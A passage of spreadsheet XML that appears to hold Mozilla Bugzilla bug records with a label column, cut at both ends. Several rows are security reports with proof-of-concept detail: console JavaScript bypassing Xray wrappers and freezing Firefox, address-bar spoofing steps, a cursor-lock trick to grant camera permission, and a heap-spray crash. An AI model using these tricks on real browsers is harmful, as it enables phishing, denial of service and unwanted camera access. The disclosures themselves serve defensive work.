If the window then is closed, mouse cursor will be locked in the middle of ANY active firefox window until the firefox process is terminated (can't be cancelled with Escape key)
Extra Cursor lock demonstration (getUserMedia Video): 
-Makes use of the aforementioned cursor lock to grant Video camera permission by opening another window that asks for permission with the confirm button positioned where the mouse cursor would be centered and locked.</t>
        </is>
      </c>
      <c r="X4576" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4577">
      <c r="A4577" t="n">
        <v>320309</v>
      </c>
      <c r="B4577" t="inlineStr">
        <is>
          <t>2005-12-14 16:58:31 -0800</t>
        </is>
      </c>
      <c r="C4577" t="inlineStr">
        <is>
          <t>Update "Changes" Page for 2.16.11, 2.18.5, 2.20.1, and 2.22rc1</t>
        </is>
      </c>
      <c r="D4577" t="inlineStr">
        <is>
          <t>2006-02-21 00:25:44 -0800</t>
        </is>
      </c>
      <c r="E4577" t="n">
        <v>1</v>
      </c>
      <c r="F4577" t="n">
        <v>1</v>
      </c>
      <c r="G4577" t="n">
        <v>4</v>
      </c>
      <c r="H4577" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4577" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4577" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K4577" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L4577" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4577" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4577" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4577" t="inlineStr"/>
      <c r="Q4577" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4577" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4577" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4577" t="n">
        <v>1</v>
      </c>
      <c r="U4577" t="n">
        <v>0</v>
      </c>
      <c r="V4577" t="n">
        <v>16</v>
      </c>
      <c r="W4577" t="inlineStr">
        <is>
          <t>I'll probably end up doing this if nobody else does, but I always appreciate a patch! :-)</t>
        </is>
      </c>
      <c r="X4577" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4578">
      <c r="A4578" t="n">
        <v>359231</v>
      </c>
      <c r="B4578" t="inlineStr">
        <is>
          <t>2006-11-02 11:20:46 -0800</t>
        </is>
      </c>
      <c r="C4578" t="inlineStr">
        <is>
          <t>Keyboard Shortcuts need to be the same as the current Eudora</t>
        </is>
      </c>
      <c r="D4578" t="inlineStr">
        <is>
          <t>2010-02-03 14:57:45 -0800</t>
        </is>
      </c>
      <c r="E4578" t="n">
        <v>1</v>
      </c>
      <c r="F4578" t="n">
        <v>1</v>
      </c>
      <c r="G4578" t="n">
        <v>6</v>
      </c>
      <c r="H4578" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4578" t="inlineStr">
        <is>
          <t>Penelope Graveyard</t>
        </is>
      </c>
      <c r="J4578" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4578" t="inlineStr">
        <is>
          <t>0.1</t>
        </is>
      </c>
      <c r="L4578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4578" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4578" t="inlineStr"/>
      <c r="Q4578" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4578" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4578" t="n">
        <v>1</v>
      </c>
      <c r="U4578" t="n">
        <v>12</v>
      </c>
      <c r="V4578" t="n">
        <v>32</v>
      </c>
      <c r="W4578" t="inlineStr">
        <is>
          <t>The Keyboard shortcuts for Penelope need to be re-mapped to be as close as possible to the current Eudora. Per Steve Dorner:
The proper solution is to allow a high-level user choice amongst:
Mac Eudora keybindings
Windows Eudora keybindings
Thunderbird keybindings
We may eventually wish to add another set or two, for:
Unified Windows/Mac Eudora keybindings
Unified Eudora/Thunderbird keybindings</t>
        </is>
      </c>
      <c r="X4578" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4579">
      <c r="A4579" t="n">
        <v>541023</v>
      </c>
      <c r="B4579" t="inlineStr">
        <is>
          <t>2010-01-20 22:33:15 -0800</t>
        </is>
      </c>
      <c r="C4579" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Thunderbird 3.0.1 to bouncer</t>
        </is>
      </c>
      <c r="D4579" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4579" t="n">
        <v>1</v>
      </c>
      <c r="F4579" t="n">
        <v>1</v>
      </c>
      <c r="G4579" t="n">
        <v>5</v>
      </c>
      <c r="H4579" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4579" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4579" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4579" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4579" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N4579" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4579" t="inlineStr"/>
      <c r="Q4579" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4579" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4579" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4579" t="n">
        <v>1</v>
      </c>
      <c r="U4579" t="n">
        <v>0</v>
      </c>
      <c r="V4579" t="n">
        <v>4</v>
      </c>
      <c r="W4579" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #532370 +++
solaris-sparc:
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.0 to 3.0.1):
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0-3.0.1.en-US.solaris-10-fcs-sparc.partial.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0-3.0.1.en-US.solaris-10-fcs-i386.partial.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0-3.0.1.en-US.opensolaris-sparc.partial.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0-3.0.1.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.0.1:
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.solaris-10-fcs-sparc.complete.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.solaris-10-fcs-i386.complete.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.opensolaris-sparc.complete.mar
/thunderbird/releases/3.0.1/contrib/solaris_tarball/thunderbird-3.0.1.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X4579" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4580">
      <c r="A4580" t="n">
        <v>1007403</v>
      </c>
      <c r="B4580" t="inlineStr">
        <is>
          <t>2014-05-07 15:40:27 -0700</t>
        </is>
      </c>
      <c r="C4580" t="inlineStr">
        <is>
          <t>Trim rsync modules (May 2014 OMG we still have to do this edition)</t>
        </is>
      </c>
      <c r="D4580" t="inlineStr">
        <is>
          <t>2014-09-04 21:10:14 -0700</t>
        </is>
      </c>
      <c r="E4580" t="n">
        <v>1</v>
      </c>
      <c r="F4580" t="n">
        <v>1</v>
      </c>
      <c r="G4580" t="n">
        <v>5</v>
      </c>
      <c r="H4580" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4580" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4580" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K4580" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4580" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4580" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4580" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4580" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4580" t="inlineStr"/>
      <c r="Q4580" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4580" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4580" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4580" t="n">
        <v>1</v>
      </c>
      <c r="U4580" t="n">
        <v>0</v>
      </c>
      <c r="V4580" t="n">
        <v>5</v>
      </c>
      <c r="W4580" t="inlineStr">
        <is>
          <t>Turns out people are still pulling from releases-rsync.m.o, and the modules are either huge or crufty.</t>
        </is>
      </c>
      <c r="X4580" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4581">
      <c r="A4581" t="n">
        <v>1378207</v>
      </c>
      <c r="B4581" t="inlineStr">
        <is>
          <t>2017-07-04 12:10:30 -0700</t>
        </is>
      </c>
      <c r="C4581" t="inlineStr">
        <is>
          <t>instanceof operator can bypass Xray and run unprivileged proxy trap</t>
        </is>
      </c>
      <c r="D4581" t="inlineStr">
        <is>
          <t>2018-02-01 17:25:31 -0800</t>
        </is>
      </c>
      <c r="E4581" t="n">
        <v>1</v>
      </c>
      <c r="F4581" t="n">
        <v>1</v>
      </c>
      <c r="G4581" t="n">
        <v>3</v>
      </c>
      <c r="H4581" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4581" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4581" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4581" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4581" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4581" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4581" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4581" t="inlineStr">
        <is>
          <t>[adv-main56+]</t>
        </is>
      </c>
      <c r="Q4581" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4581" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4581" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T4581" t="n">
        <v>1</v>
      </c>
      <c r="U4581" t="n">
        <v>0</v>
      </c>
      <c r="V4581" t="n">
        <v>44</v>
      </c>
      <c r="W4581" t="inlineStr">
        <is>
          <t>Open the web console in a new tab, and run
  var obj, iframe = document.createElement('iframe');
  iframe.onload = function() {
    obj = iframe.contentWindow.eval(`new Proxy({}, {
      getPrototypeOf: function() { alert('proxy trap'); return null; }
    })`);
  };
  document.body.appendChild(iframe);
You can check that obj is an Xray wrapper:
  Cu.isXrayWrapper(obj); // true
Then, run
  obj instanceof Ci.nsIDOMWindow;
The trap runs and the alert is shown!! I think Xray is supposed to avoid this kind of things, e.g. this does not run the trap
  obj instanceof Window;
Since the console uses instanceof to display objects nicely, any page can exploit this to freeze Firefox by running
  var proxy = new Proxy({}, {getPrototypeOf: () =&gt; proxy });
  console.log(Object.create(proxy));
Not sure it's necessary, but since Xray is a security thing and is being bypassed, I am marking this bug as core-security.</t>
        </is>
      </c>
      <c r="X4581" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4582">
      <c r="A4582" t="n">
        <v>724247</v>
      </c>
      <c r="B4582" t="inlineStr">
        <is>
          <t>2012-02-04 06:18:11 -0800</t>
        </is>
      </c>
      <c r="C4582" t="inlineStr">
        <is>
          <t>Mozilla Firefox 10.0 Address Bar Spoofing Vulnerability.</t>
        </is>
      </c>
      <c r="D4582" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E4582" t="n">
        <v>1</v>
      </c>
      <c r="F4582" t="n">
        <v>1</v>
      </c>
      <c r="G4582" t="n">
        <v>6</v>
      </c>
      <c r="H4582" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4582" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4582" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K4582" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4582" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4582" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4582" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4582" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4582" t="inlineStr">
        <is>
          <t>[sg:dupe 724599]</t>
        </is>
      </c>
      <c r="Q4582" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4582" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4582" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4582" t="n">
        <v>1</v>
      </c>
      <c r="U4582" t="n">
        <v>0</v>
      </c>
      <c r="V4582" t="n">
        <v>11</v>
      </c>
      <c r="W4582" t="inlineStr">
        <is>
          <t>Created attachment 594439
Vulnerability Proof of concept.
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.3 Safari/535.19
Steps to reproduce:
Hi,
When you drag a URL into the address bar of the Mozilla Firefox open the page automatically, but if an attacker to convince the victim to drag an address of a site, and follow with "window.stop ();" the address remains in dragging address bar, thus allowing the attacker to make phishing attacks.
Reproduce:
1. Open PoC.html attached.
2. Drag the text in address bar.
3. See the address bar(in PoC "www.google.com.br").
Regards,
Mario.</t>
        </is>
      </c>
      <c r="X4582" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4583">
      <c r="A4583" t="n">
        <v>416461</v>
      </c>
      <c r="B4583" t="inlineStr">
        <is>
          <t>2008-02-08 16:20:36 -0800</t>
        </is>
      </c>
      <c r="C4583" t="inlineStr">
        <is>
          <t>Crash [@ nsStyleContext::Release] on reload with mathml element and menupopup</t>
        </is>
      </c>
      <c r="D4583" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E4583" t="n">
        <v>1</v>
      </c>
      <c r="F4583" t="n">
        <v>1</v>
      </c>
      <c r="G4583" t="n">
        <v>3</v>
      </c>
      <c r="H4583" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4583" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4583" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4583" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4583" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4583" t="inlineStr">
        <is>
          <t>[sg:critical] post-1.8-branch [fixed by 431705]</t>
        </is>
      </c>
      <c r="Q4583" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4583" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4583" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4583" t="n">
        <v>1</v>
      </c>
      <c r="U4583" t="n">
        <v>0</v>
      </c>
      <c r="V4583" t="n">
        <v>14</v>
      </c>
      <c r="W4583" t="inlineStr">
        <is>
          <t>Created attachment 302219
testcase (crashes on reload)
See testcase, which crashes with current trunk build on reload.
This regressed on trunk between 2008-01-09 and 2008-01-10:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-01-09+04&amp;maxdate=2008-01-10+06&amp;cvsroot=%2Fcvsroot
Regression from bug 404146 or bug 404192
http://crash-stats.mozilla.com/report/index/e2985d57-d6a1-11dc-ae09-001a4bd43ef6
0  	@0x25a161f  	
1 	nsStyleContext::Release() 	nsStyleContext.h:92
2 	nsFrame::~nsFrame() 	mozilla/layout/generic/nsFrame.cpp:350
3 	nsAreaFrame::`scalar deleting destructor'(unsigned int) 	
4 	nsFrame::Destroy() 	mozilla/layout/generic/nsFrame.cpp:510
5 	nsContainerFrame::Destroy() 	mozilla/layout/generic/nsContainerFrame.cpp:299
6 	nsBlockFrame::Destroy() 	mozilla/layout/generic/nsBlockFrame.cpp:314
7 	nsFrameList::DestroyFrames() 	mozilla/layout/generic/nsFrameList.cpp:67
8 	nsContainerFrame::Destroy() 	mozilla/layout/generic/nsContainerFrame.cpp:257
9 	nsFrameList::DestroyFrames() 	mozilla/layout/generic/nsFrameList.cpp:67
10 	nsContainerFrame::Destroy() 	mozilla/layout/generic/nsContainerFrame.cpp:257
11 	nsFrameList::DestroyFrames() 	mozilla/layout/generic/nsFrameList.cpp:67
12 	nsContainerFrame::Destroy() 	mozilla/layout/generic/nsContainerFrame.cpp:257
13 	nsFrameManager::Destroy() 	mozilla/layout/base/nsFrameManager.cpp:283
14 	PresShell::Destroy() 	mozilla/layout/base/nsPresShell.cpp:1673
15 	DocumentViewerImpl::Destroy() 	mozilla/layout/base/nsDocumentViewer.cpp:1522
16 	DocumentViewerImpl::Show() 	mozilla/layout/base/nsDocumentViewer.cpp:1842
17 	nsPresContext::EnsureVisible(int) 	mozilla/layout/base/nsPresContext.cpp:1449
18 	PresShell::UnsuppressAndInvalidate() 	mozilla/layout/base/nsPresShell.cpp:4247
19 	PresShell::UnsuppressPainting() 	mozilla/layout/base/nsPresShell.cpp:4307
20 	DocumentViewerImpl::LoadComplete(unsigned int) 	mozilla/layout/base/nsDocumentViewer.cpp:1013
21 	nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) 	mozilla/docshell/base/nsDocShell.cpp:5031
22 	nsWebShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) 	mozilla/docshell/base/nsWebShell.cpp:1013
23 	nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) 	mozilla/docshell/base/nsDocShell.cpp:4931</t>
        </is>
      </c>
      <c r="X4583" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4584">
      <c r="A4584" t="n">
        <v>1358248</v>
      </c>
      <c r="B4584" t="inlineStr">
        <is>
          <t>2017-04-20 12:54:42 -0700</t>
        </is>
      </c>
      <c r="C4584" t="inlineStr">
        <is>
          <t>Address bar spoof in reader mode</t>
        </is>
      </c>
      <c r="D4584" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:11 -0700</t>
        </is>
      </c>
      <c r="E4584" t="n">
        <v>1</v>
      </c>
      <c r="F4584" t="n">
        <v>1</v>
      </c>
      <c r="G4584" t="n">
        <v>3</v>
      </c>
      <c r="H4584" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4584" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4584" t="inlineStr">
        <is>
          <t>Reader Mode</t>
        </is>
      </c>
      <c r="K4584" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4584" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4584" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4584" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4584" t="inlineStr">
        <is>
          <t>[adv-main54+]</t>
        </is>
      </c>
      <c r="Q4584" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4584" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4584" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4584" t="n">
        <v>1</v>
      </c>
      <c r="U4584" t="n">
        <v>0</v>
      </c>
      <c r="V4584" t="n">
        <v>41</v>
      </c>
      <c r="W4584" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Steps to reproduce:
1. Go to about:reader?url=https%3A%2F%2Ftest.shhnjk.com%2Fcsp_read.php
Actual results:
address before @ is shown in address bar which could be used for phishing.
Expected results:
user information (left side of @) in url should not be shown in address bar. This is incomplete fix of https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/#CVE-2017-5463</t>
        </is>
      </c>
      <c r="X4584" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4585">
      <c r="A4585" t="n">
        <v>1168959</v>
      </c>
      <c r="B4585" t="inlineStr">
        <is>
          <t>2015-05-27 11:39:23 -0700</t>
        </is>
      </c>
      <c r="C4585" t="inlineStr">
        <is>
          <t>Memory-safety bugs in NetworkUtils.cpp generally</t>
        </is>
      </c>
      <c r="D4585" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:39 -0700</t>
        </is>
      </c>
      <c r="E4585" t="n">
        <v>1</v>
      </c>
      <c r="F4585" t="n">
        <v>1</v>
      </c>
      <c r="G4585" t="n">
        <v>6</v>
      </c>
      <c r="H4585" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4585" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4585" t="inlineStr">
        <is>
          <t>Wifi</t>
        </is>
      </c>
      <c r="K4585" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4585" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4585" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4585" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4585" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2?][post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q4585" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4585" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4585" t="inlineStr">
        <is>
          <t>2.2 S14 (12june)</t>
        </is>
      </c>
      <c r="T4585" t="n">
        <v>1</v>
      </c>
      <c r="U4585" t="n">
        <v>0</v>
      </c>
      <c r="V4585" t="n">
        <v>30</v>
      </c>
      <c r="W4585" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:***) Gecko/20100101 Firefox/**.*
Build ID: 20150305021524
Steps to reproduce:
38.0.1\dom\system\gonk\NetworkUtils.cpp has several memory-safety bugs resulting from the use of snprintf. The problem is that it assumes that snprintf always null-terminates the stack-based destination string. This is not, however, guaranteed unless the result string length is &lt; the specified character count, and, of course, automatic variables are generally uninitialized, so the result string won't be null-terminated by default.
There are 3 good examples of this bug in NetworkUtils::setAccessPoint, and several others throughout the module.
If any of the strings used as input to snprintf are under external control, this bug could cause the disclosure of sensitive information and/or allow an attacker to corrupt Firefox's address space and/or send attacker-designated network commands and/or allow execution of attacker-chosen code.</t>
        </is>
      </c>
      <c r="X4585" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4586">
      <c r="A4586" t="n">
        <v>641388</v>
      </c>
      <c r="B4586" t="inlineStr">
        <is>
          <t>2011-03-13 15:09:00 -0700</t>
        </is>
      </c>
      <c r="C4586" t="inlineStr">
        <is>
          <t>Crash in nsRefreshDriver::Notify with assertion in CSSFrameConstructor</t>
        </is>
      </c>
      <c r="D4586" t="inlineStr">
        <is>
          <t>2013-05-18 18:14:32 -0700</t>
        </is>
      </c>
      <c r="E4586" t="n">
        <v>1</v>
      </c>
      <c r="F4586" t="n">
        <v>1</v>
      </c>
      <c r="G4586" t="n">
        <v>3</v>
      </c>
      <c r="H4586" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4586" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4586" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4586" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4586" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4586" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4586" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4586" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4586" t="n">
        <v>1</v>
      </c>
      <c r="U4586" t="n">
        <v>0</v>
      </c>
      <c r="V4586" t="n">
        <v>34</v>
      </c>
      <c r="W4586" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Description:
        The attached testcase has been reduced from a very large testcase (~3 Megs). The resulting testcase is still quite large (~80 lines of JavaScript), however further reduction made were not possible or made it very hard to reproduce. The reason for
 the crash is not obvious from the testcase.
        Following assertion can be observed on a Linux debug build:
        ASSERTION: Dying in the middle of our own update?: mUpdateCount == 0, file ../../../layout/base/nsCSSFrameConstructor.h, line 89
Affected Versions:
        Firefox 4.0 RC1
Testcase:
        The testcase is attached as an HTML file. It will crash the browser on opening after several reloads.
Testcase Notes:
        The testcase implements two function to improve the reproducability of the testcase. gc() triggers garbage collection. It requires Jesse's quitter extension (https://www.squarefree.com/extensions/quitter.xpi).
        fill() works similar to a heap spray and fills the memory with a byte pattern.
Stack Backtrace:
Following crash has been observed on Windows. This indicates that code exection is possible. Similar behaviour has been seen on linux as well.
Windows:
(e5c.1360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!nsRefreshDriver::Notify+0x5b9:
625fa199 8b08            mov     ecx,dword ptr [eax]  ds:002b:fafafafb=????????
625fa19b 57              push    edi
625fa19c ffd1            call    ecx
xul!nsRefreshDriver::Notify+0x5b9
xul!nsTimerImpl::Fire+0x103
xul!nsTimerEvent::Run+0x20
xul!nsThread::ProcessNextEvent+0x2d7
xul!mozilla::ipc::MessagePump::Run+0x6e
xul!MessageLoop::RunInternal+0x11
xul!MessageLoop::RunHandler+0x1d
nspr4!PR_GetThreadPrivate+0x20
xul!nsBaseAppShell::Run+0x34
xul!nsAppShell::Run+0x42
xul!nsAppStartup::Run+0x1e
xul!XRE_main+0xdec
firefox!wmain+0x34c
firefox!__tmainCRTStartup+0x152
kernel32!BaseThreadInitThunk+0xe
ntdll32!__RtlUserThreadStart+0x70
ntdll32!_RtlUserThreadStart+0x1b
VulnDev reference    : vd11002
reported by nils of vulndev ltd.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4586" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4587">
      <c r="A4587" t="n">
        <v>600464</v>
      </c>
      <c r="B4587" t="inlineStr">
        <is>
          <t>2010-09-28 22:05:38 -0700</t>
        </is>
      </c>
